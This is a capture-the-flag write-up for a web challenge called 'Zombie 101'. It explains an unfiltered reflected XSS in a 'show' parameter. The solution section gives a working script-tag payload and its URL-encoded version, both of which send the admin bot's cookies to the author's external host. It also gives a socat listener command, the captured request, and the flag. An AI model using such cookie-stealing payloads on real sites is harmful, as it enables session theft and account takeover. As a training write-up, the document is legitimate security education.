CTFtime.org

Zombie 101

by shinmai / while;do echo buffer owlerflow;done

Tags: web xss 

Rating:

# Zombie 101 - Web (100 pts)

## Description
> Can you survive the Zombie gauntlet!?
>
> First in a sequence of four related challenges. Solving one will unlock the next one in the sequence.
>
> They all use the same source code but each one has a different configuration > file.
>
> This first one is a garden variety "steal the admin's cookie".
>
> Good luck!
>
> **Please don't use any automated tools like dirbuster/sqlmap/etc.. on ANY challenges. They won't help anyway.**
>
> https://zombie-101-tlejfksioa-ul.a.run.app

## Provided files
zombie-101-source.zip - a ZIP archive with the source code for the website and the admin bot \[[download](https://ctfnote.shinmai.wtf:31337/files/downloadFile?id=m8JOpS1fmtIHrGV)\]

## Ideas and observations
1. the description pretty explicitly states this is an XSS challenge, and the source code confirms this
2. There's just a straight up unfiltered XSS in the `/zombie` route on the `show` GET parameter

## Notes
1. for some reason my go-to of `` did't work for the bot but did in testing

## Solution
1. Let's just use a straight-up script tag, then: `<script>window.location='http://ctf.shinmai.wtf/?cookie='+btoa(JSON.stringify(document.cookie));</script>`
2. URL encode it, add it to the url and send the result to the bot `https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ewindow%2Elocation%3D%27http%3A%2F%2Fctf%2Eshinmai%2Ewtf%2F%3Fcookie%3D%27%2Bbtoa%28JSON%2Estringify%28document%2Ecookie%29%29%3B%3C%2Fscript%3E`
3. on the server just set up a simple socat listener `socat tcp-listen:80,reuseaddr,fork -`
4. We soon get the following:
```
GET /?cookie=ImZsYWc9d2N0ZntjMTQ1NTFjLTRkbTFuLTgwNy1jaDQxLW4xYzMtajA4LTkzMjYxfSI= HTTP/1.1
referer: https://zombie-101-tlejfksioa-ul.a.run.app/zombie?show=%3Cscript%3Ewindow%2Elocation%3D%27http%3A%2F%2Fctf%2Eshinmai%2Ewtf%2F%3Fcookie%3D%27%2Bbtoa%28JSON%2Estringify%28document%2Ecookie%29%29%3B%3C%2Fscript%3E
accept: text/html,*/*
content-type: application/x-www-form-urlencoded;charset=UTF-8
user-agent: Mozilla/5.0 Chrome/10.0.613.0 Safari/534.15 Zombie.js/6.1.4
host: ctf.shinmai.wtf
Connection: keep-alive
```
5. decode the base64 for the flag

`wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261}`

Original writeup (https://gist.github.com/shinmai/5720d1f0a214d0878cfb530eb975c469#zombie-101---web-100-pts).

Comments